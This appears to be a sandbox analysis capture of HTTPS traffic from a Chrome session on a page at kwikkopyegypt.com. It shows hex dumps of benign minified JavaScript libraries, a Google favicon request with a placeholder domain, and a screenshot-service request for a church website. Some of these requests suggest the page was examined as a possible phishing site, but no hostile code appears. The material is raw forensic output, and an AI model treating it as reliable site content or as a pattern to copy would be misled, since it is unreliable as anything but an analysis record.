                                                                                                    2025-03-10 12:50:42 UTC1369INData Raw: 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 6f 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6f 2c 74 5b 6f 5d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 2c 74 2c 6f 29 7b 76 61 72 20 69 3d 54 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 65 2e 6e 61 6d 65 3b 72 65 74 75 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20
                                                                                                    Data Ascii: removeAttribute(o):e.setAttribute(o,t[o])})}function F(e,t,o){var i=T(e,function(e){var o=e.name;return o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required
                                                                                                    2025-03-10 12:50:42 UTC1369INData Raw: 75 72 6e 20 61 3d 61 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 76 61 72 20 6e 3d 28 31 3d 3d 3d 69 3f 21 72 3a 72 29 3f 27 68 65 69 67 68 74 27 3a 27 77 69 64 74 68 27 2c 70 3d 21 31 3b 72 65 74 75 72 6e 20 65 2e 72 65 64 75 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d
                                                                                                    Data Ascii: urn a=a.map(function(e,i){var n=(1===i?!r:r)?'height':'width',p=!1;return e.reduce(function(e,t){return''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}
                                                                                                    2025-03-10 12:50:42 UTC1369INData Raw: 69 67 75 72 61 62 6c 65 3d 21 30 2c 27 76 61 6c 75 65 27 69 6e 20 6f 26 26 28 6f 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6f 2e 6b 65 79 2c 6f 29 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 6f 2c 69 29 7b 72 65 74 75 72 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74
                                                                                                    Data Ascii: igurable=!0,'value'in o&&(o.writable=!0),Object.defineProperty(e,o.key,o)}return function(t,o,i){return o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.2453985104.17.24.144436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:50:42 UTC651OUTGET /ajax/libs/axios/0.20.0/axios.min.js HTTP/1.1
                                                                                                    Host: cdnjs.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: script
                                                                                                    Referer: https://kwikkopyegypt.com/
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:50:42 UTC960INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 10 Mar 2025 12:50:42 GMT
                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Cache-Control: public, max-age=30672000
                                                                                                    ETag: W/"649629d3-133f"
                                                                                                    Last-Modified: Fri, 23 Jun 2023 23:25:07 GMT
                                                                                                    cf-cdnjs-via: cfworker/r2
                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                    Timing-Allow-Origin: *
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    CF-Cache-Status: HIT
                                                                                                    Age: 379286
                                                                                                    Expires: Sat, 28 Feb 2026 12:50:42 GMT
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hIO4r4ayVe5dPGfkYZPh6VxwYvG1TS0qoBJ25pv7qWLUQ4bTpHL22lDOU%2FIzw38ggfFW0W4tNu%2BuazGD6jUsVSd2Eiw0AqZwKgm7oaqC%2Fshzt%2FtDKTTaTkivX1Z5CA6Y1sB1QKNu"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                    Strict-Transport-Security: max-age=15780000
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 91e2f0781dbdf833-ORD
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2025-03-10 12:50:42 UTC409INData Raw: 33 37 62 39 0d 0a 2f 2a 20 61 78 69 6f 73 20 76 30 2e 32 30 2e 30 20 7c 20 28 63 29 20 32 30 32 30 20 62 79 20 4d 61 74 74 20 5a 61 62 72 69 73 6b 69 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 2e 61 78 69 6f 73 3d 74 28 29 3a 65 2e 61 78 69 6f 73 3d 74 28 29 7d 28 74 68 69 73 2c 66 75 6e 63
                                                                                                    Data Ascii: 37b9/* axios v0.20.0 | (c) 2020 by Matt Zabriskie */!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.axios=t():e.axios=t()}(this,func
                                                                                                    2025-03-10 12:50:42 UTC1369INData Raw: 64 65 64 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 6e 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 2e 6d 3d 65 2c 74 2e 63 3d 6e 2c 74 2e 70 3d 22 22 2c 74 28 30 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 65 2e 65 78 70 6f 72 74 73 3d 6e 28 31 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 76 61 72 20 74 3d 6e 65 77 20 73 28 65 29 2c 6e 3d 69 28 73 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 71 75 65 73 74 2c 74 29 3b 72 65 74 75 72 6e 20 6f 2e 65 78 74 65 6e 64 28 6e 2c 73 2e 70 72 6f 74 6f 74 79 70 65 2c 74 29 2c 6f 2e 65 78 74 65 6e 64 28 6e 2c 74 29 2c 6e 7d 76 61 72 20 6f 3d 6e 28 32 29 2c 69 3d 6e 28 33 29 2c 73 3d 6e 28 34 29 2c 61 3d 6e 28 32
                                                                                                    Data Ascii: ded=!0,o.exports}var n={};return t.m=e,t.c=n,t.p="",t(0)}([function(e,t,n){e.exports=n(1)},function(e,t,n){"use strict";function r(e){var t=new s(e),n=i(s.prototype.request,t);return o.extend(n,s.prototype,t),o.extend(n,t),n}var o=n(2),i=n(3),s=n(4),a=n(2
                                                                                                    2025-03-10 12:50:42 UTC1369INData Raw: 6f 6e 20 6d 28 65 29 7b 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 42 6c 6f 62 5d 22 3d 3d 3d 52 2e 63 61 6c 6c 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 65 29 7b 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 46 75 6e 63 74 69 6f 6e 5d 22 3d 3d 3d 52 2e 63 61 6c 6c 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 28 65 29 7b 72 65 74 75 72 6e 20 70 28 65 29 26 26 79 28 65 2e 70 69 70 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 26 26 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 5e 5c 73 2a 2f 2c
                                                                                                    Data Ascii: on m(e){return"[object Blob]"===R.call(e)}function y(e){return"[object Function]"===R.call(e)}function g(e){return p(e)&&y(e.pipe)}function v(e){return"undefined"!=typeof URLSearchParams&&e instanceof URLSearchParams}function x(e){return e.replace(/^\s*/,
                                                                                                    2025-03-10 12:50:42 UTC1369INData Raw: 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 6e 65 77 20 41 72 72 61 79 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 2c 72 3d 30 3b 72 3c 6e 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 5b 72 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3b 72 65 74 75 72 6e 20 65 2e 61 70 70 6c 79 28 74 2c 6e 29 7d 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 74 68 69 73 2e 64 65 66 61 75 6c 74 73 3d 65 2c 74 68 69 73 2e 69 6e 74 65 72 63 65 70 74 6f 72 73 3d 7b 72 65 71 75 65 73 74 3a 6e 65 77 20 73 2c 72 65 73
                                                                                                    Data Ascii: n(e,t){"use strict";e.exports=function(e,t){return function(){for(var n=new Array(arguments.length),r=0;r<n.length;r++)n[r]=arguments[r];return e.apply(t,n)}}},function(e,t,n){"use strict";function r(e){this.defaults=e,this.interceptors={request:new s,res
                                                                                                    2025-03-10 12:50:42 UTC1369INData Raw: 22 5b 22 29 2e 72 65 70 6c 61 63 65 28 2f 25 35 44 2f 67 69 2c 22 5d 22 29 7d 76 61 72 20 6f 3d 6e 28 32 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 69 3b 69 66 28 6e 29 69 3d 6e 28 74 29 3b 65 6c 73 65 20 69 66 28 6f 2e 69 73 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 74 29 29 69 3d 74 2e 74 6f 53 74 72 69 6e 67 28 29 3b 65 6c 73 65 7b 76 61 72 20 73 3d 5b 5d 3b 6f 2e 66 6f 72 45 61 63 68 28 74 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6e 75 6c 6c 21 3d 3d 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 26 26 28 6f 2e 69 73 41 72 72 61 79 28 65 29 3f 74 2b 3d 22 5b 5d 22 3a 65 3d 5b 65 5d 2c 6f 2e 66 6f 72 45 61 63 68 28 65 2c
                                                                                                    Data Ascii: "[").replace(/%5D/gi,"]")}var o=n(2);e.exports=function(e,t,n){if(!t)return e;var i;if(n)i=n(t);else if(o.isURLSearchParams(t))i=t.toString();else{var s=[];o.forEach(t,function(e,t){null!==e&&"undefined"!=typeof e&&(o.isArray(e)?t+="[]":e=[e],o.forEach(e,
                                                                                                    2025-03-10 12:50:42 UTC1369INData Raw: 65 73 70 6f 6e 73 65 26 26 28 74 2e 72 65 73 70 6f 6e 73 65 2e 64 61 74 61 3d 69 28 74 2e 72 65 73 70 6f 6e 73 65 2e 64 61 74 61 2c 74 2e 72 65 73 70 6f 6e 73 65 2e 68 65 61 64 65 72 73 2c 65 2e 74 72 61 6e 73 66 6f 72 6d 52 65 73 70 6f 6e 73 65 29 29 29 2c 50 72 6f 6d 69 73 65 2e 72 65 6a 65 63 74 28 74 29 7d 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 32 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2e 66 6f 72 45 61 63 68 28 6e 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 65 3d 6e 28 65 2c 74 29 7d 29 2c 65 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74
                                                                                                    Data Ascii: esponse&&(t.response.data=i(t.response.data,t.response.headers,e.transformResponse))),Promise.reject(t)})}},function(e,t,n){"use strict";var r=n(2);e.exports=function(e,t,n){return r.forEach(n,function(n){e=n(e,t)}),e}},function(e,t){"use strict";e.export
                                                                                                    2025-03-10 12:50:42 UTC1369INData Raw: 5b 22 64 65 6c 65 74 65 22 2c 22 67 65 74 22 2c 22 68 65 61 64 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 75 2e 68 65 61 64 65 72 73 5b 65 5d 3d 7b 7d 7d 29 2c 69 2e 66 6f 72 45 61 63 68 28 5b 22 70 6f 73 74 22 2c 22 70 75 74 22 2c 22 70 61 74 63 68 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 75 2e 68 65 61 64 65 72 73 5b 65 5d 3d 69 2e 6d 65 72 67 65 28 61 29 7d 29 2c 65 2e 65 78 70 6f 72 74 73 3d 75 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 32 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 2e 66 6f 72 45 61 63 68 28 65 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 72 21 3d 3d 74 26 26 72 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3d 3d 3d 74 2e
                                                                                                    Data Ascii: ["delete","get","head"],function(e){u.headers[e]={}}),i.forEach(["post","put","patch"],function(e){u.headers[e]=i.merge(a)}),e.exports=u},function(e,t,n){"use strict";var r=n(2);e.exports=function(e,t){r.forEach(e,function(n,r){r!==t&&r.toUpperCase()===t.
                                                                                                    2025-03-10 12:50:42 UTC1369INData Raw: 6f 75 74 20 6f 66 20 22 2b 65 2e 74 69 6d 65 6f 75 74 2b 22 6d 73 20 65 78 63 65 65 64 65 64 22 3b 65 2e 74 69 6d 65 6f 75 74 45 72 72 6f 72 4d 65 73 73 61 67 65 26 26 28 74 3d 65 2e 74 69 6d 65 6f 75 74 45 72 72 6f 72 4d 65 73 73 61 67 65 29 2c 6e 28 66 28 74 2c 65 2c 22 45 43 4f 4e 4e 41 42 4f 52 54 45 44 22 2c 6c 29 29 2c 6c 3d 6e 75 6c 6c 7d 2c 72 2e 69 73 53 74 61 6e 64 61 72 64 42 72 6f 77 73 65 72 45 6e 76 28 29 29 7b 76 61 72 20 67 3d 28 65 2e 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 7c 7c 63 28 79 29 29 26 26 65 2e 78 73 72 66 43 6f 6f 6b 69 65 4e 61 6d 65 3f 69 2e 72 65 61 64 28 65 2e 78 73 72 66 43 6f 6f 6b 69 65 4e 61 6d 65 29 3a 76 6f 69 64 20 30 3b 67 26 26 28 64 5b 65 2e 78 73 72 66 48 65 61 64 65 72 4e 61 6d 65 5d 3d 67 29 7d 69 66 28
                                                                                                    Data Ascii: out of "+e.timeout+"ms exceeded";e.timeoutErrorMessage&&(t=e.timeoutErrorMessage),n(f(t,e,"ECONNABORTED",l)),l=null},r.isStandardBrowserEnv()){var g=(e.withCredentials||c(y))&&e.xsrfCookieName?i.read(e.xsrfCookieName):void 0;g&&(d[e.xsrfHeaderName]=g)}if(
                                                                                                    2025-03-10 12:50:42 UTC1369INData Raw: 67 65 2c 6e 61 6d 65 3a 74 68 69 73 2e 6e 61 6d 65 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 74 68 69 73 2e 64 65 73 63 72 69 70 74 69 6f 6e 2c 6e 75 6d 62 65 72 3a 74 68 69 73 2e 6e 75 6d 62 65 72 2c 66 69 6c 65 4e 61 6d 65 3a 74 68 69 73 2e 66 69 6c 65 4e 61 6d 65 2c 6c 69 6e 65 4e 75 6d 62 65 72 3a 74 68 69 73 2e 6c 69 6e 65 4e 75 6d 62 65 72 2c 63 6f 6c 75 6d 6e 4e 75 6d 62 65 72 3a 74 68 69 73 2e 63 6f 6c 75 6d 6e 4e 75 6d 62 65 72 2c 73 74 61 63 6b 3a 74 68 69 73 2e 73 74 61 63 6b 2c 63 6f 6e 66 69 67 3a 74 68 69 73 2e 63 6f 6e 66 69 67 2c 63 6f 64 65 3a 74 68 69 73 2e 63 6f 64 65 7d 7d 2c 65 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 32 29 3b 65 2e 65 78 70 6f 72 74 73 3d 72
                                                                                                    Data Ascii: ge,name:this.name,description:this.description,number:this.number,fileName:this.fileName,lineNumber:this.lineNumber,columnNumber:this.columnNumber,stack:this.stack,config:this.config,code:this.code}},e}},function(e,t,n){"use strict";var r=n(2);e.exports=r
                                                                                                    2025-03-10 12:50:42 UTC1369INData Raw: 72 65 66 65 72 65 72 22 2c 22 72 65 74 72 79 2d 61 66 74 65 72 22 2c 22 75 73 65 72 2d 61 67 65 6e 74 22 5d 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 2c 69 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 20 65 3f 28 72 2e 66 6f 72 45 61 63 68 28 65 2e 73 70 6c 69 74 28 22 5c 6e 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 69 3d 65 2e 69 6e 64 65 78 4f 66 28 22 3a 22 29 2c 74 3d 72 2e 74 72 69 6d 28 65 2e 73 75 62 73 74 72 28 30 2c 69 29 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 72 2e 74 72 69 6d 28 65 2e 73 75 62 73 74 72 28 69 2b 31 29 29 2c 74 29 7b 69 66 28 73 5b 74 5d 26 26 6f 2e 69 6e 64 65 78 4f 66 28 74 29 3e 3d 30 29 72 65 74 75 72 6e 3b 22 73 65 74 2d 63 6f 6f 6b 69 65 22 3d 3d 3d 74 3f 73
                                                                                                    Data Ascii: referer","retry-after","user-agent"];e.exports=function(e){var t,n,i,s={};return e?(r.forEach(e.split("\n"),function(e){if(i=e.indexOf(":"),t=r.trim(e.substr(0,i)).toLowerCase(),n=r.trim(e.substr(i+1)),t){if(s[t]&&o.indexOf(t)>=0)return;"set-cookie"===t?s


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.2453993142.250.186.1324436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:50:46 UTC691OUTGET /s2/favicons?domain=?v=BUILD_HASH HTTP/1.1
                                                                                                    Host: www.google.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                    X-Client-Data: CIS2yQEIpbbJAQipncoBCIb0ygEIlKHLAQiKo8sBCIWgzQEI+dfOARj0yc0B
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: image
                                                                                                    Referer: https://kwikkopyegypt.com/
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:50:47 UTC313INHTTP/1.1 404 Not Found
                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Date: Mon, 10 Mar 2025 12:50:47 GMT
                                                                                                    Server: sffe
                                                                                                    Content-Length: 1593
                                                                                                    X-XSS-Protection: 0
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close
                                                                                                    2025-03-10 12:50:47 UTC1065INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65
                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-se
                                                                                                    2025-03-10 12:50:47 UTC528INData Raw: 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74
                                                                                                    Data Ascii: p.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;widt


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.245399654.156.104.1334436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:50:47 UTC625OUTGET /get/width/1200/http://southwark.anglican.org HTTP/1.1
                                                                                                    Host: image.thum.io
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: image
                                                                                                    Referer: https://kwikkopyegypt.com/
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:50:48 UTC268INHTTP/1.1 403
                                                                                                    Date: Mon, 10 Mar 2025 12:50:48 GMT
                                                                                                    Content-Type: image/png
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Cache-Control: no-cache, no-store, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                    2025-03-10 12:50:48 UTC39INData Raw: 32 31 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 04 b0 08 06 00 00 00 eb 21 b3 cf 0d 0a
                                                                                                    Data Ascii: 21PNGIHDR!
